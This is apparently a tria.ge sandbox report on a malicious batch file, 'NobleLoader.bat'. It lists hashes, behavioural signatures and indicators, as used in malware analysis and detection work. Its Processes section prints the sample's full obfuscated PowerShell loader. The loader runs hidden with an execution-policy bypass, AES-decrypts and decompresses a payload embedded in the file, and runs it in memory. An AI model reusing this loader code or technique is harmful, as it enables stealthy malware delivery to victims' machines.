Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
120s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
13/10/2023, 01:36
Static task
static1
Behavioral task
behavioral1
Sample
NobleLoader.bat
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
NobleLoader.bat
Resource
win10v2004-20230915-en
General
-
Target
NobleLoader.bat
-
Size
14.7MB
-
MD5
41171b66cefb46e58ba0df569a29588b
-
SHA1
ef11eca23d8b41ca19fc88029ebb4ff672de2f9f
-
SHA256
314414050eb799fc18f7ee3b8846245f12e991944ef28460de7d76146fbd73fe
-
SHA512
04dfa344fc41fbded8b90b72291fa97916a6b569503cf6e366e88b00c3d1ecedbe51bcc6b5aecd0ba995a3a0a8af568cb0921d0c1e9e5693051ff2caa6c0ce35
-
SSDEEP
49152:htLRC7rgOCeCecxKk5As27eSlwlLe/KY/yhRsfP6NcgDn8etxb6Qg8H3VkgLh+tE:J
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 2148 NobleLoader.bat.exe -
Loads dropped DLL 1 IoCs
pid Process 2080 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2148 NobleLoader.bat.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2148 NobleLoader.bat.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2080 wrote to memory of 2148 2080 cmd.exe 29 PID 2080 wrote to memory of 2148 2080 cmd.exe 29 PID 2080 wrote to memory of 2148 2080 cmd.exe 29
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\NobleLoader.bat"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2080 -
C:\Users\Admin\AppData\Local\Temp\NobleLoader.bat.exe"NobleLoader.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function dKkPF($rLJWw){ $ySOir=[System.Security.Cryptography.Aes]::Create(); $ySOir.Mode=[System.Security.Cryptography.CipherMode]::CBC; $ySOir.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $ySOir.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5fl4XsmQUlo5HqJe6IBfvpWzFzSP1woqDovxAl5nwYc='); $ySOir.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JV1yPqn7LVbeB01ZBy1dKQ=='); $oPUml=$ySOir.CreateDecryptor(); $return_var=$oPUml.TransformFinalBlock($rLJWw, 0, $rLJWw.Length); $oPUml.Dispose(); $ySOir.Dispose(); $return_var;}function dpCjA($rLJWw){ $NUAvB=New-Object System.IO.MemoryStream(,$rLJWw); $Tmkrt=New-Object System.IO.MemoryStream; $XuDmZ=New-Object System.IO.Compression.GZipStream($NUAvB, [IO.Compression.CompressionMode]::Decompress); $XuDmZ.CopyTo($Tmkrt); $XuDmZ.Dispose(); $NUAvB.Dispose(); $Tmkrt.Dispose(); $Tmkrt.ToArray();}function MAUEU($rLJWw,$UonDX){ $QBoaH=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$rLJWw); $qHjlp=$QBoaH.EntryPoint; $qHjlp.Invoke($null, $UonDX);}$jzSnL=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\NobleLoader.bat').Split([Environment]::NewLine);foreach ($oDbrA in $jzSnL) { if ($oDbrA.StartsWith('SEROXEN')) { $JjzPL=$oDbrA.Substring(7); break; }}$gLogk=[string[]]$JjzPL.Split('\');$iDoUz=dpCjA (dKkPF ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($gLogk[0])));$JhZoF=dpCjA (dKkPF ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($gLogk[1])));MAUEU $JhZoF (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));MAUEU $iDoUz (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2148
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d
-
Filesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d